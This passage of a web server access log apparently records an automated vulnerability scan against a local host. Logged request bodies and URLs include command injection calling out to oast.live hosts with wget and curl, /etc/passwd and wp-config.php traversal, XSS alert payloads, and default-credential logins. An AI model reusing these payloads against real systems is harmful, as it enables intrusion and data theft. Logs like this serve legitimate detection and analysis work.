+0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /register/?redirect_to=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.915","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://c9oms3gsmpve1ijt0mc0bd6g43mcbebqj.oast.live #","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.308","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/smoosh-status.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.689","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.394","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.400","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.423","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.circleci/config.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.412","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:35 +0000","request_body":"target_addr=\x221.1.1.1+`wget+http%3A%2F%2Fc9oms3gsmpve1ijt0mc0sdimznj1pjxo6.oast.live%2F`\x22&waninf=127.0.0.1\x22","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /boaform/admin/formTracert HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.418","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/diag_ping_admin_en.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.ssh/authorized_keys HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"2.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"_charset_=utf-8&j_username=grios&j_password=password&j_validate=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.392","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://c9oms3gsmpve1ijt0mc0bj41mya7xn7a7.oast.live #","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/snyk.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.331","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /m/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.681","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.441","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.408","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.416","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.790","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"\x221\x22:1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.405","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.914","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"_charset_=utf-8&j_username=replication-receiver&j_password=replication-receiver&j_validate=true","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.309","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /lab.html?vpath=//example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.493","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ajax/networking/get_netcfg.php?iface=;curl%20http://c9oms3gsmpve1ijt0mc0cza6mbjtxrtoz.oast.live/`whoami`; HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.342","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.452","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /public/css/28fHqNVFbqFitwvGN34cj1037TY.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.938","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.397","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.420","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"{\x22id\x22: 1, \x22method\x22: \x22global.login\x22, \x22params\x22: {\x22authorityType\x22: \x22Default\x22, \x22clientType\x22: \x22NetKeyboard\x22, \x22loginType\x22: \x22Direct\x22, \x22password\x22: \x22Not Used\x22, \x22passwordType\x22: \x22Default\x22, \x22userName\x22: \x22admin\x22}, \x22session\x22: 0}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /RPC2_Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.331","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /express-graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://c9oms3gsmpve1ijt0mc0tt6f4zsj5yb6r.oast.live&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /public/index.php/home/file/user_pics HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.305","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/script%3E?page=securimage-wp-options%2F HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.405","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sfmc/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.446","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:36 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET 